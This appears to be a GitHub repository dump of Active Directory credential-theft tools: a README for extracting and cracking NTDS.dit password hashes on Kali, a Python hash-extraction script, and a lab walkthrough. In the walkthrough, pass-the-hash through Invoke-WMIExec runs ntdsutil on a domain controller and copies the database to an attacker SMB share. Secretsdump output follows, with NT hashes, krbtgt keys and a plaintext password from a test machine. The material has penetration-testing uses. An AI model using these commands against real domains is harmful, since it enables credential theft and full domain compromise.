├── practice_ntds.zip
├── ntdsxtract_v1_0.zip
├── libesedb-alpha-20120102.tar.gz
├── README.md
├── dshashes.py
└── dump-ntds.md


/practice_ntds.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/practice_ntds.zip


--------------------------------------------------------------------------------
/ntdsxtract_v1_0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/ntdsxtract_v1_0.zip


--------------------------------------------------------------------------------
/libesedb-alpha-20120102.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/interference-security/ntds-tools/HEAD/libesedb-alpha-20120102.tar.gz


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # ntds-tools
 2 | Tools for NTDS.dit
 3 | 
 4 | https://govolution.wordpress.com/2016/04/13/ntds-cracking-with-kali/
 5 | 
 6 | https://gist.github.com/ddouhine/018ac4a8c95498101e7f
 7 | 
 8 | ##Installation on Kali
 9 | 
10 | wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
11 | 
12 | wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
13 | 
14 | tar -zxf libesedb-alpha-20120102.tar.gz
15 | 
16 | cd libesedb-20120102/
17 | 
18 | ./configure && make && sudo make install
19 | 
20 | wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
21 | 
22 | unzip ntdsxtract_v1_0.zip
23 | 
24 | ##Extract Hashes
25 | 
26 | /root/Downloads/ntds/libesedb-20120102/esedbtools/esedbexport ntds.dit
27 | 
28 | python /root/Downloads/ntds/NTDSXtract\ 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7
29 | 
30 | ./hashdumpwork –passwordhashes SYSTEM –lmoutfile ./lm-out.txt –ntoutfile ./nt-out.txt –pwdformat ophc > dsusers.results
31 | 
32 | grep -A 2 “Password hashes:” dsusers.results |grep -v “Password hashes” |grep -v ‘Record ID’|grep -v “\-\-” |sort|uniq > allHashes
33 | 
34 | grep ‘\$NT\$’ allHashes | sed ‘s/.\(.*\)/\1/’ > NTHashes
35 | 
36 | grep -v ‘\$NT\$’ allHashes | sed ‘s/.\(.*\)/\1/’ > LMHashes
37 | 
38 | ##Cracking
39 | 
40 | john –fork=8 NTHashes
41 | 


--------------------------------------------------------------------------------
/dshashes.py:
--------------------------------------------------------------------------------
  1 | # This file was derived from dsusers.py, which is is part of ntdsxtract.
  2 | #
  3 | # ntdsxtract is free software: you can redistribute it and/or modify
  4 | # it under the terms of the GNU General Public License as published by
  5 | # the Free Software Foundation, either version 3 of the License, or
  6 | # (at your option) any later version.
  7 | #
  8 | # ntdsxtract is distributed in the hope that it will be useful,
  9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 11 | # GNU General Public License for more details.
 12 | #
 13 | # You should have received a copy of the GNU General Public License
 14 | # along with ntdsxtract.  If not, see <http://www.gnu.org/licenses/>.
 15 | 
 16 | '''
 17 | @editor:        LaNMaSteR53
 18 | @author:        Csaba Barta
 19 | @license:       GNU General Public License 2.0 or later
 20 | @contact:       csaba.barta@gmail.com
 21 | '''
 22 | 
 23 | from ntds.dsdatabase import *
 24 | from ntds.dsrecord import *
 25 | from ntds.dslink import *
 26 | from ntds.dstime import *
 27 | from ntds.dsobjects import *
 28 | 
 29 | def usage():
 30 |     print "DSHashes"
 31 |     print "Extracts user hashes in a user-friendly format\n"
 32 |     print "usage: %s <datatable> <linktable> [option]" % sys.argv[0]
 33 |     print "  options:"
 34 |     print "    --rid <user rid>"
 35 |     print "          List user identified by RID"
 36 |     print "    --name <user name>"
 37 |     print "          List user identified by Name"
 38 |     print "    --passwordhashes <system hive>"
 39 |     print "          Extract password hashes"
 40 |     print "    --passwordhistory <system hive>"
 41 |     print "          Extract password history"
 42 |     print "    --exclude-disabled"
 43 |     print "          Exclude disabled accounts from output"
 44 | 
 45 | if len(sys.argv) < 3:
 46 |     usage()
 47 |     sys.exit(1)
 48 | 
 49 | rid = -1
 50 | name = ""
 51 | syshive = ""
 52 | pwdump = False
 53 | pwhdump = False
 54 | optid = 0
 55 | excl_dsbl = False
 56 | print "Running with options:"
 57 | for opt in sys.argv:
 58 |     if opt == "--rid":
 59 |         if len(sys.argv) < 5:
 60 |             usage()
 61 |             sys.exit(1)
 62 |         rid = int(sys.argv[optid + 1])
 63 |         print "\tUser RID: %d" % rid
 64 |     if opt == "--name":
 65 |         if len(sys.argv) < 5:
 66 |             usage()
 67 |             sys.exit(1)
 68 |         name = sys.argv[optid + 1]
 69 |         print "\tUser name: %s" % name
 70 |     if opt == "--passwordhashes":
 71 |         if len(sys.argv) < 5:
 72 |             usage()
 73 |             sys.exit(1)
 74 |         syshive = sys.argv[optid + 1]
 75 |         pwdump = True
 76 |         print "\tExtracting password hashes"
 77 |     if opt == "--passwordhistory":
 78 |         if len(sys.argv) < 5:
 79 |             usage()
 80 |             sys.exit(1)
 81 |         syshive = sys.argv[optid + 1]
 82 |         pwhdump = True
 83 |         print "\tExtracting password history"
 84 |     if '--exclude-disabled' in sys.argv:
 85 |         excl_dsbl = True
 86 |     optid += 1 
 87 | 
 88 | db = dsInitDatabase(sys.argv[1])
 89 | dl = dsInitLinks(sys.argv[2])
 90 | 
 91 | if pwdump or pwhdump:
 92 |     dsInitEncryption(syshive)
 93 | 
 94 | utype = -1
 95 | utype = dsGetTypeIdByTypeName(db, "Person")
 96 | if utype == -1:
 97 |     print "Unable to get type id for Person"
 98 |     sys.exit()
 99 | 
100 | print "\nList of hashes:"
101 | print "=============="
102 | for recordid in dsMapLineIdByRecordId:
103 |     if int(dsGetRecordType(db, recordid)) == utype:
104 |         user = dsUser(db, recordid)
105 |         if rid != -1 and user.SID.RID != rid:
106 |             continue
107 |         if name != "" and user.Name != name:
108 |             continue
109 |         if excl_dsbl:
110 |             user_disabled = False
111 |             for uac in user.getUserAccountControl():
112 |                 if uac == 'Disabled': user_disabled = True
113 |             if user_disabled: continue
114 | 
115 |         if pwdump == True:
116 |             nthash = ''
117 |             lmhash = 'aad3b435b51404eeaad3b435b51404ee'
118 |             (lm, nt) = user.getPasswordHashes()
119 |             if nt != '':
120 |                 nthash = nt
121 |                 if lm != '':
122 |                     lmhash = lm
123 |             hash = "%s:%s:%s:%s:::" % (user.SAMAccountName, user.SID.RID, lmhash, nthash)
124 |             if nt != '':
125 |                 print hash
126 | 
127 |         if pwhdump == True:
128 |             lmhistory = None
129 |             nthistory = None
130 |             (lmhistory, nthistory) = user.getPasswordHistory()
131 |             if nthistory != None:
132 |                 hashid = 0
133 |                 for nthash in nthistory:
134 |                     print "%s_nthistory%d:%s:E52CAC67419A9A224A3B108F3FA6CB6D:%s:::" % (user.SAMAccountName, hashid, user.SID.RID, nthash)
135 |                     hashid += 1
136 |                 if lmhistory != None:
137 |                     hashid = 0
138 |                     for lmhash in lmhistory:
139 |                         print "%s_lmhistory%d:%s:%s:8846F7EAEE8FB117AD06BDD830B7586C:::" % (user.SAMAccountName, hashid, user.SID.RID, lmhash)
140 |                         hashid += 1
141 | 
142 | if pwhdump == True:
143 |   print "\n[*] NOTE: NT and LM hashes are shown on individual lines with the respective hash of 'password' in the opposing position."
144 |   print "This is done in order to make sure the output plays nice with various hash cracking tools. Account for this when cracking historical hashes.\n"
145 | 


--------------------------------------------------------------------------------
/dump-ntds.md:
--------------------------------------------------------------------------------
  1 | ## Dump NTDS.dit file from target server:
  2 | 
  3 | How Attackers Dump Active Directory Database Credentials: https://adsecurity.org/?p=2398
  4 | 
  5 | How-to-dump-windows2012-credentials: https://github.com/nixawk/pentest-wiki/blob/master/4.Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md
  6 | 
  7 | Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash
  8 | 
  9 | ### Find NTDS.dit file location using this command in CMD and Powershell
 10 | ```
 11 | PS C:\> reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
 12 | 
 13 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
 14 |     System Schema Version    REG_DWORD    0x38
 15 |     Root Domain    REG_SZ    DC=test,DC=local
 16 |     Configuration NC    REG_SZ    CN=Configuration,DC=test,DC=local
 17 |     Machine DN Name    REG_SZ    CN=NTDS Settings,CN=WIN-PJNUFB8U83P,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=test,DC=local
 18 |     DsaOptions    REG_SZ    1
 19 |     IsClone    REG_DWORD    0x0
 20 |     ServiceDll    REG_EXPAND_SZ    %systemroot%\system32\ntdsa.dll
 21 |     DSA Working Directory    REG_SZ    C:\Windows\NTDS
 22 |     DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit
 23 |     Database backup path    REG_SZ    C:\Windows\NTDS\dsadata.bak
 24 |     Database log files path    REG_SZ    C:\Windows\NTDS
 25 |     Hierarchy Table Recalculation interval (minutes)    REG_DWORD    0x2d0
 26 |     Database logging/recovery    REG_SZ    ON
 27 |     DS Drive Mappings    REG_MULTI_SZ    c:\=\\?\Volume{7e3f7bcd-5ece-11e6-93e8-806e6f6e6963}\
 28 |     DSA Database Epoch    REG_DWORD    0x79fd
 29 |     Strict Replication Consistency    REG_DWORD    0x1
 30 |     Schema Version    REG_DWORD    0x38
 31 |     ldapserverintegrity    REG_DWORD    0x1
 32 |     Global Catalog Promotion Complete    REG_DWORD    0x1
 33 |    
 34 | PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
 35 | 
 36 | System Schema Version                            : 56
 37 | Root Domain                                      : DC=test,DC=local
 38 | Configuration NC                                 : CN=Configuration,DC=test,DC=local
 39 | Machine DN Name                                  : CN=NTDS Settings,CN=WIN-PJNUFB8U83P,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=test,DC=local
 40 | DsaOptions                                       : 1
 41 | IsClone                                          : 0
 42 | ServiceDll                                       : C:\Windows\system32\ntdsa.dll
 43 | DSA Working Directory                            : C:\Windows\NTDS
 44 | DSA Database file                                : C:\Windows\NTDS\ntds.dit
 45 | Database backup path                             : C:\Windows\NTDS\dsadata.bak
 46 | Database log files path                          : C:\Windows\NTDS
 47 | Hierarchy Table Recalculation interval (minutes) : 720
 48 | Database logging/recovery                        : ON
 49 | DS Drive Mappings                                : {c:\=\\?\Volume{7e3f7bcd-5ece-11e6-93e8-806e6f6e6963}\}
 50 | DSA Database Epoch                               : 31229
 51 | Strict Replication Consistency                   : 1
 52 | Schema Version                                   : 56
 53 | ldapserverintegrity                              : 1
 54 | Global Catalog Promotion Complete                : 1
 55 | PSPath                                           : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
 56 | PSParentPath                                     : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS
 57 | PSChildName                                      : Parameters
 58 | PSDrive                                          : HKLM
 59 | PSProvider                                       : Microsoft.PowerShell.Core\Registry
 60 | ```
 61 | 
 62 | ### Make sure `temp` folder in SMB share is writable and empty before NTDSUtil tries writing to it
 63 | 
 64 | ### Using batch script:
 65 | ```
 66 | root@kali:/mnt/smb_share/temp# cat ../exp.bat 
 67 | ntdsutil "ac i ntds" "ifm" "create full \\192.168.136.128\kali_smb_share\temp" q q
 68 | 
 69 | PS C:\> Invoke-WMIExec -verbose -Domain test.local -Username master -Hash 4557b6a0a22dc7cafd03c4a40e77f7e1 -Target 192.168.136.130 -Command "cmd /c \\192.168.136.128\kali_smb_share\exp.bat"
 70 | VERBOSE: Connecting to 192.168.136.130:135
 71 | VERBOSE: WMI reports target hostname as WIN-PJNUFB8U83P
 72 | VERBOSE: test.local\master accessed WMI on 192.168.136.130
 73 | VERBOSE: Using WIN-PJNUFB8U83P for random port extraction
 74 | VERBOSE: Connecting to 192.168.136.130:49154
 75 | VERBOSE: Attempting command execution
 76 | Command executed with process ID 3116 on 192.168.136.130
 77 | ```
 78 | 
 79 | ### Using powershell script:
 80 | ```
 81 | root@kali:/mnt/smb_share/temp# cat ../exp.ps1 
 82 | $A = Invoke-Expression 'ntdsutil "ac i ntds" "ifm" "create full \\192.168.136.128\kali_smb_share\temp" q q' -ErrorVariable $B -WarningVariable $C -Verbose
 83 | Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\out.log -InputObject $A -Encoding ASCII
 84 | Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\error.log -InputObject $B -Encoding ASCII
 85 | Out-File -FilePath \\192.168.136.128\kali_smb_share\temp\warning.log -InputObject $C -Encoding ASCII
 86 | 
 87 | PS C:\> Invoke-WMIExec -verbose -Domain test.local -Username master -Hash 4557b6a0a22dc7cafd03c4a40e77f7e1 -Target 192.168.136.130 -Command "powershell -NoP -sta -NonI -W Hidden -Exec bypass -File \\192.168.136.128\kali_smb_share\exp.ps1"
 88 | VERBOSE: Connecting to 192.168.136.130:135
 89 | VERBOSE: WMI reports target hostname as WIN-PJNUFB8U83P
 90 | VERBOSE: test.local\master accessed WMI on 192.168.136.130
 91 | VERBOSE: Using WIN-PJNUFB8U83P for random port extraction
 92 | VERBOSE: Connecting to 192.168.136.130:49154
 93 | VERBOSE: Attempting command execution
 94 | Command executed with process ID 3128 on 192.168.136.130
 95 | ```
 96 | 
 97 | ## Dump contents of NTDS.dit file
 98 | 
 99 | ```
100 | root@kali:/mnt/smb_share/temp# locate smbexec.py
101 | /opt/Veil/Veil-Pillage/lib/impacket_smbexec.py
102 | /usr/local/bin/smbexec.py
103 | /usr/share/doc/python-impacket/examples/smbexec.py
104 | /usr/share/keimpx/lib/smbexec.py
105 | 
106 | root@kali:/mnt/smb_share/temp# secretsdump.py -system '/mnt/smb_share/temp/registry/SYSTEM' -security '/mnt/smb_share/temp/registry/SECURITY' -ntds '/mnt/smb_share/temp/Active Directory/ntds.dit' LOCAL
107 | Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
108 | 
109 | INFO:root:Target system bootKey: 0xc2aaa99b063f6b9c9c836e8a9d0b6b59
110 | INFO:root:Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
111 | INFO:root:Dumping LSA Secrets
112 | INFO:root:$MACHINE.ACC 
113 | $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:033513a7b82596b25264a1ca49203824
114 | INFO:root:DefaultPassword 
115 | (Unknown User):ROOT#123
116 | INFO:root:DPAPI_SYSTEM 
117 |  0000   01 00 00 00 63 09 9F 09  CA 4C FB 62 38 6A FE 37   ....c....L.b8j.7
118 |  0010   9E 74 4F B8 1C CF EC F5  6A 1A DA 56 67 5F 1F 13   .tO.....j..Vg_..
119 |  0020   14 BC 43 2B BB 79 EA C8  7B AF EE 82               ..C+.y..{...
120 | INFO:root:NL$KM 
121 |  0000   D7 BB 16 96 AB 11 49 D9  E6 38 CC 46 59 EC CC 65   ......I..8.FY..e
122 |  0010   1E 17 D2 BC B2 33 E5 97  A9 91 5A 1F D7 79 37 71   .....3....Z..y7q
123 |  0020   F9 40 A4 8D 5F 66 9C 5B  69 4A 70 C7 E8 ED 1D B8   .@.._f.[iJp.....
124 |  0030   1A 54 30 E1 AB 6C FA F3  96 97 96 E5 F0 F1 DD 99   .T0..l..........
125 | INFO:root:Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
126 | INFO:root:Searching for pekList, be patient
127 | INFO:root:Pek found and decrypted: 0xed11979a1de0316229732c75231f7d7d
128 | INFO:root:Reading and decrypting hashes from /mnt/smb_share/temp/Active Directory/ntds.dit 
129 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:cb136a448767792bae25563a498a86e6:::
130 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
131 | test1:1001:aad3b435b51404eeaad3b435b51404ee:393ee50e62f891cb5b7ae3ead79376ac:::
132 | test2:1002:aad3b435b51404eeaad3b435b51404ee:6b1d71c4691455f46c59bae11126d4a4:::
133 | WIN-PJNUFB8U83P$:1003:aad3b435b51404eeaad3b435b51404ee:033513a7b82596b25264a1ca49203824:::
134 | krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c728695aa9b97cb064a5de26ba77112d:::
135 | test.local\slave:1107:aad3b435b51404eeaad3b435b51404ee:ff5484488517e138ef86fbb3e7fe1133:::
136 | test.local\master:1108:aad3b435b51404eeaad3b435b51404ee:4557b6a0a22dc7cafd03c4a40e77f7e1:::
137 | INFO:root:Kerberos keys from /mnt/smb_share/temp/Active Directory/ntds.dit 
138 | WIN-PJNUFB8U83P$:aes256-cts-hmac-sha1-96:0126f1b74a8b21d3240e04cd7fd1b15f3900850d6b8453a95bc71d3fbe431a25
139 | WIN-PJNUFB8U83P$:aes128-cts-hmac-sha1-96:92618b22bf62c7251c433a19c537ea6c
140 | WIN-PJNUFB8U83P$:des-cbc-md5:f18a4aad4938b564
141 | krbtgt:aes256-cts-hmac-sha1-96:6d6607f3c1c56697436abf49a380a8f2f0486bd177201b1b245c01310328cb3b
142 | krbtgt:aes128-cts-hmac-sha1-96:695845f807093ce19c7f4ff79dcdc023
143 | krbtgt:des-cbc-md5:5eb564893e73027c
144 | test.local\slave:aes256-cts-hmac-sha1-96:1062fece2758c08941859d7482d2786e49cdc35899c0f7824148f9b68853d1d8
145 | test.local\slave:aes128-cts-hmac-sha1-96:b415a6275c7b49c27090a823d55d5e9e
146 | test.local\slave:des-cbc-md5:626dababb558d54a
147 | test.local\master:aes256-cts-hmac-sha1-96:667dd1da063265b55cf5abe47e4b743b7019a831e51cb5675653bcb5652896da
148 | test.local\master:aes128-cts-hmac-sha1-96:02383fd8e3322ce68eb131984ba8c37d
149 | test.local\master:des-cbc-md5:d63173252cf42fc1
150 | INFO:root:Cleaning up...
151 | ```
152 | 
153 | ## Note
154 | All the hashes and passwords you will find above are not being used/re-used by me anywhere and the test machine where it was generated was destroyed. Contact me if you still want the plaintext data.
155 | 


--------------------------------------------------------------------------------